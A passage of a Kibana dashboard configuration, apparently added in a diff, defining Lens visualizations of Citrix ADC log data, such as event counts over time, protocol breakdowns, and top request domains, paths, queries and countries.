{ + 
"emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "destination.bytes" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "fe0867c1-6ca2-4dac-88ce-6f1b36a9d1bf", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "e2506703-c355-4307-9b8c-623fa77c78a6", + "layerType": "data", + "metricAccessor": "a95bb479-ae81-400c-a6bc-520017a50865" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "6c5b6057-a76c-4a86-9ae5-5648e38c7b71", + "w": 12, + "x": 36, + "y": 9 + }, + "panelIndex": "6c5b6057-a76c-4a86-9ae5-5648e38c7b71", + "title": "Destination Bytes [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-771a3ae6-3454-44c5-8386-30e43d147b04", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9e48fe6b-c833-4cf4-82cc-8323783d52e1", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "771a3ae6-3454-44c5-8386-30e43d147b04": { + "columnOrder": [ + "ba5adb31-b2ef-4f81-8198-113f0a110634", + "2af89df4-37dc-4db9-9535-750816f7d0fc" + ], + "columns": { + "2af89df4-37dc-4db9-9535-750816f7d0fc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": 
"Events", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "ba5adb31-b2ef-4f81-8198-113f0a110634": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "9e48fe6b-c833-4cf4-82cc-8323783d52e1", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "2af89df4-37dc-4db9-9535-750816f7d0fc" + ], + "layerId": "771a3ae6-3454-44c5-8386-30e43d147b04", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "ba5adb31-b2ef-4f81-8198-113f0a110634" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + 
}, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "4c8a3f96-6e7a-4bdb-acbe-f52e4f7dc6b2", + "w": 36, + "x": 12, + "y": 18 + }, + "panelIndex": "4c8a3f96-6e7a-4bdb-acbe-f52e4f7dc6b2", + "title": "Events Over Time [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-771a3ae6-3454-44c5-8386-30e43d147b04", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f2fd7484-cb11-4fe0-947b-a5c3e845e677", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "771a3ae6-3454-44c5-8386-30e43d147b04": { + "columnOrder": [ + "ba5adb31-b2ef-4f81-8198-113f0a110634", + "2af89df4-37dc-4db9-9535-750816f7d0fc" + ], + "columns": { + "2af89df4-37dc-4db9-9535-750816f7d0fc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Severity", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "event.severity" + }, + "ba5adb31-b2ef-4f81-8198-113f0a110634": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "f2fd7484-cb11-4fe0-947b-a5c3e845e677", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": 
"citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "2af89df4-37dc-4db9-9535-750816f7d0fc" + ], + "layerId": "771a3ae6-3454-44c5-8386-30e43d147b04", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "ba5adb31-b2ef-4f81-8198-113f0a110634" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "7fd7a318-184d-4c0c-b0ee-b8958117a04a", + "w": 24, + "x": 0, + "y": 33 + }, + "panelIndex": "7fd7a318-184d-4c0c-b0ee-b8958117a04a", + "title": "Severity Over Time [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-1d85203e-e619-44d1-99eb-1890f1a7c084", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f1141519-608f-4767-96cc-24e8842474ca", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1d85203e-e619-44d1-99eb-1890f1a7c084": { + "columnOrder": [ + "be5e4478-ddff-4c4b-9783-7ab345a5ada0", + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2" + ], + "columns": { + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2": { + "customLabel": true, + "dataType": "number", + "isBucketed": 
false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "be5e4478-ddff-4c4b-9783-7ab345a5ada0": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Network Transport", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 5 + }, + "scale": "ordinal", + "sourceField": "network.transport" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "f1141519-608f-4767-96cc-24e8842474ca", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "1d85203e-e619-44d1-99eb-1890f1a7c084", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "be5e4478-ddff-4c4b-9783-7ab345a5ada0" + ], + "truncateLegend": false + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": 
"b1a20813-82f1-4ba0-b295-695020f85209", + "w": 24, + "x": 24, + "y": 33 + }, + "panelIndex": "b1a20813-82f1-4ba0-b295-695020f85209", + "title": "Events by Network Transport [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-1d85203e-e619-44d1-99eb-1890f1a7c084", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9e133606-638d-42c5-a4ef-01ec82c06598", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1d85203e-e619-44d1-99eb-1890f1a7c084": { + "columnOrder": [ + "be5e4478-ddff-4c4b-9783-7ab345a5ada0", + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2" + ], + "columns": { + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "be5e4478-ddff-4c4b-9783-7ab345a5ada0": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Network Protocol", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "network.protocol" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "9e133606-638d-42c5-a4ef-01ec82c06598", + 
"key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "1d85203e-e619-44d1-99eb-1890f1a7c084", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "be5e4478-ddff-4c4b-9783-7ab345a5ada0" + ], + "truncateLegend": false + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "a2059241-c442-45ca-a3f9-9155480ec367", + "w": 24, + "x": 0, + "y": 48 + }, + "panelIndex": "a2059241-c442-45ca-a3f9-9155480ec367", + "title": "Events by Network Protocol [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-1d85203e-e619-44d1-99eb-1890f1a7c084", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cf79bd3f-262a-4663-8fff-63b00b87c34b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1d85203e-e619-44d1-99eb-1890f1a7c084": { + "columnOrder": [ + "be5e4478-ddff-4c4b-9783-7ab345a5ada0", + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2" + ], + "columns": { + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + 
}, + "be5e4478-ddff-4c4b-9783-7ab345a5ada0": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Priority", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 5 + }, + "scale": "ordinal", + "sourceField": "citrix.priority" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "cf79bd3f-262a-4663-8fff-63b00b87c34b", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "1d85203e-e619-44d1-99eb-1890f1a7c084", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "be5e4478-ddff-4c4b-9783-7ab345a5ada0" + ], + "truncateLegend": false + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "2df4dd1c-9b9c-411a-9aed-c37b6a535b78", + "w": 24, + "x": 24, + "y": 48 + }, + "panelIndex": "2df4dd1c-9b9c-411a-9aed-c37b6a535b78", + "title": "Events by Priority [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + 
"embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "813eba55-180f-41d5-9693-3bb4cbaa5b93", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c9ccb6a3-5949-4684-ba32-c58cd71c456f": { + "columnOrder": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668", + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "columns": { + "2811b187-15f5-43ce-9ade-c45af8a68fe2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "3dfaccf6-7e23-41a7-ac37-28df731cf668": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Request Domain", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2811b187-15f5-43ce-9ade-c45af8a68fe2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "url.domain" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "813eba55-180f-41d5-9693-3bb4cbaa5b93", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { 
+ "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668" + ] + } + ], + "shape": "treemap" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "87d8f4ae-bff3-4541-93f6-5f0495b22354", + "w": 16, + "x": 0, + "y": 63 + }, + "panelIndex": "87d8f4ae-bff3-4541-93f6-5f0495b22354", + "title": "Top 10 Request Domain [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0000c5e7-f881-4b37-84b1-5f87b3c39298", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c9ccb6a3-5949-4684-ba32-c58cd71c456f": { + "columnOrder": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668", + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "columns": { + "2811b187-15f5-43ce-9ade-c45af8a68fe2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "3dfaccf6-7e23-41a7-ac37-28df731cf668": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Request Path", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + 
"missingBucket": false, + "orderBy": { + "columnId": "2811b187-15f5-43ce-9ade-c45af8a68fe2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "url.path" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "0000c5e7-f881-4b37-84b1-5f87b3c39298", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668" + ] + } + ], + "shape": "treemap" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "6362ec71-d94c-40ae-a3b0-6fd99a74f3fa", + "w": 16, + "x": 16, + "y": 63 + }, + "panelIndex": "6362ec71-d94c-40ae-a3b0-6fd99a74f3fa", + "title": "Top 10 Request Path [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c67b80ce-454e-4e6c-b76d-1b09a8fe8736", + "type": "index-pattern" + } + ], + 
"state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c9ccb6a3-5949-4684-ba32-c58cd71c456f": { + "columnOrder": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668", + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "columns": { + "2811b187-15f5-43ce-9ade-c45af8a68fe2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "3dfaccf6-7e23-41a7-ac37-28df731cf668": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Request Query", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2811b187-15f5-43ce-9ade-c45af8a68fe2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "url.query" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "c67b80ce-454e-4e6c-b76d-1b09a8fe8736", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + 
], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668" + ] + } + ], + "shape": "treemap" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "04dd2a49-ecb6-4a37-9ed1-ff4cb32e7315", + "w": 16, + "x": 32, + "y": 63 + }, + "panelIndex": "04dd2a49-ecb6-4a37-9ed1-ff4cb32e7315", + "title": "Top 10 Request Query [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "03db2a39-f594-4c99-9a96-4d0ea0803a78", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c9ccb6a3-5949-4684-ba32-c58cd71c456f": { + "columnOrder": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668", + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "columns": { + "2811b187-15f5-43ce-9ade-c45af8a68fe2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "3dfaccf6-7e23-41a7-ac37-28df731cf668": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Source Countries", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2811b187-15f5-43ce-9ade-c45af8a68fe2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + 
"sourceField": "source.geo.country_name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "03db2a39-f594-4c99-9a96-4d0ea0803a78", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668" + ] + } + ], + "shape": "treemap" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "6a0db5d9-5c35-4822-8be4-ba29d9e4a414", + "w": 24, + "x": 0, + "y": 78 + }, + "panelIndex": "6a0db5d9-5c35-4822-8be4-ba29d9e4a414", + "title": "Top 10 Source Countries [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6cf95b00-4a04-4ca9-94f4-877e91791676", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c9ccb6a3-5949-4684-ba32-c58cd71c456f": { + "columnOrder": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668", + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "columns": { + 
"2811b187-15f5-43ce-9ade-c45af8a68fe2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "3dfaccf6-7e23-41a7-ac37-28df731cf668": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Client Countries", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2811b187-15f5-43ce-9ade-c45af8a68fe2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "client.geo.country_name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "6cf95b00-4a04-4ca9-94f4-877e91791676", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668" + ] + } + ], + "shape": "treemap" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + 
